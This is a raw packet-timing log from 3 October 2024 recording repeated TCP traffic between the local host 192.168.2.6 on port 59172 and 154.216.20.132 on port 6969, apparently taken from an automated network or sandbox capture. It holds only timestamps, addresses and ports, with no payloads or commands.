                                          Oct 3, 2024 14:54:55.290525913 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.290570974 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.531339884 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.574116945 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:55.731008053 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.763596058 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:55.763705969 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:55.768572092 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.768655062 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.768666029 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.768675089 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.768713951 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.768805027 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.768815994 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.768826962 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:55.769032955 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:56.030196905 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:56.074045897 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:56.183721066 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:56.231065989 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:56.236207008 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:56.241041899 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:56.241101027 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:56.245836020 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:56.707170963 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:56.761540890 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:56.871238947 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:56.917778015 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:56.936871052 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:56.936922073 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:57.133965969 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.134011030 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.134097099 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.134196997 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.134227991 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.134259939 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.134291887 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.134322882 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.460889101 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.511533022 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:57.621428967 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.667901039 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:57.677062035 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:57.677108049 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:57.677129984 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:57.681869030 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.681945086 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.681955099 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.681963921 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.681972027 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.681982994 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.682080984 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.682090998 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.682112932 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.682121992 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686597109 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686609030 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686625004 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686633110 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686641932 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686650038 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686657906 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686672926 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686681032 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686748028 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:57.686762094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:58.018825054 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:58.074073076 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:58.168169022 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:58.214659929 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:58.230910063 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:58.235766888 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:58.235865116 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:58.240761995 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:58.616594076 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:58.714740992 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:58.785551071 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:58.886023045 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:58.890953064 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:58.892362118 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:58.897190094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:59.262056112 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:59.417831898 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:59.418457985 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:59.447828054 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:59.453190088 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:59.454813004 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:59.459686995 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:59.821811914 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:54:59.917793989 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:54:59.980693102 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:00.029072046 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:00.035027981 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:00.035222054 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:00.040169954 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:00.405431032 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:00.511651039 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:00.574796915 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:00.606177092 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:00.611155033 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:00.611552000 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:00.616620064 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:00.978338003 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:01.136889935 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:01.136981010 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:01.173994064 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:01.174060106 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:01.179024935 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:01.179032087 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:01.179037094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:01.397723913 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:01.511600018 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:01.558926105 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:01.607923031 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:01.613095999 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:01.613224983 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:01.618191957 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:01.980209112 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:02.137008905 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:02.137156963 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:02.167572975 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:02.172452927 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:02.172522068 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:02.177318096 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:02.540081024 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:02.605339050 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:02.699476004 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:02.729142904 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:02.729218960 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:02.734148026 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:02.734183073 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:02.734195948 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:02.734208107 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:02.952251911 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.011629105 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:03.105650902 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.135952950 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:03.140857935 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.140933990 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:03.145766973 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.525696993 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.684113026 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.684211016 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:03.721194983 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:03.721302986 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:03.721369028 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:03.726156950 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.726247072 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.726370096 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.726413965 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.726440907 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.726489067 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.726516008 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.726548910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731028080 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731055975 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731113911 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731141090 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731167078 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731224060 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731250048 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731276035 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731304884 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731353045 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731379986 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731446981 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.731487036 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:03.958477974 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:04.025337934 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:04.121527910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:04.214730978 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:04.247750044 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:04.252700090 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:04.252820969 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:04.257801056 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:04.620482922 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:04.714854956 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:04.777791023 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:04.825181007 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:04.830210924 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:04.830435991 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:04.835375071 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.203105927 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.356369972 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.356451035 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:05.440821886 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:05.440897942 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:05.440956116 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:05.445785046 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.445854902 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.445888996 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.445915937 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.445943117 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.445970058 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.446139097 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.446258068 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.446285009 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.446311951 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.450782061 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.450809956 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.450835943 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.450862885 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.450889111 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.450937033 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.450963020 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.450989962 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.451014996 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.451040983 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.704559088 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.858180046 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.858262062 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:05.923103094 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:05.923218012 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:05.923269033 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:05.928217888 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928241014 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928268909 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928283930 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928298950 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928324938 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928339005 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928353071 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928479910 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928508043 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928576946 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928603888 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928617954 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928633928 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.928651094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.933206081 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.933250904 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.933283091 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.933310032 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:05.933360100 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.256068945 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.402204037 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:06.418478012 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.467164993 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:06.467242002 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:06.467272043 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:06.472465992 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.472476959 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.472491026 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.472496033 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.472511053 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.472516060 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.472870111 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.473150015 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.473170042 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.473411083 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.477164030 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.477215052 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.477226973 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.477231979 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.477298021 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.477303028 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.477313995 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.477569103 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.477695942 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.702800035 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.856106043 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:06.858383894 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:07.153532028 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:07.159674883 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:07.159759045 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:07.164781094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:07.544503927 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:07.703789949 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:07.703886032 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:07.744725943 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:07.749695063 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:07.749799967 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:07.754846096 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.131567001 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.214725971 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:08.293338060 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.323626995 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:08.329013109 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.329660892 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:08.335963964 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.729193926 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.887242079 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.887494087 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:08.916820049 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:08.921653032 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:08.922154903 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:08.927035093 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.293159962 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.405188084 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:09.457139015 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.511605978 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:09.745608091 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:09.745701075 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:09.745768070 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:09.750551939 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750634909 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750667095 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750694990 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750725985 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750845909 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750942945 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.750971079 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.751000881 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.751040936 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755343914 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755454063 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755510092 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755538940 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755567074 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755594969 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755644083 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755671024 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755697966 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755723953 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755750895 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755775928 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755810022 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.755841970 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:09.987732887 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.148695946 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.148861885 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.178965092 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.179050922 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.183988094 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.184017897 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.184022903 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.184031963 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.184149981 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.404501915 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.511583090 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.559418917 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.593324900 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.593408108 CEST591726969192.168.2.6154.216.20.132
                                          Oct 3, 2024 14:55:10.598407984 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.598428011 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.598433018 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.598443031 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:10.928293943 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:11.090528011 CEST696959172154.216.20.132192.168.2.6
                                          Oct 3, 2024 14:55:11.090606928 CEST591726969192.168.2.6154.216.20.132
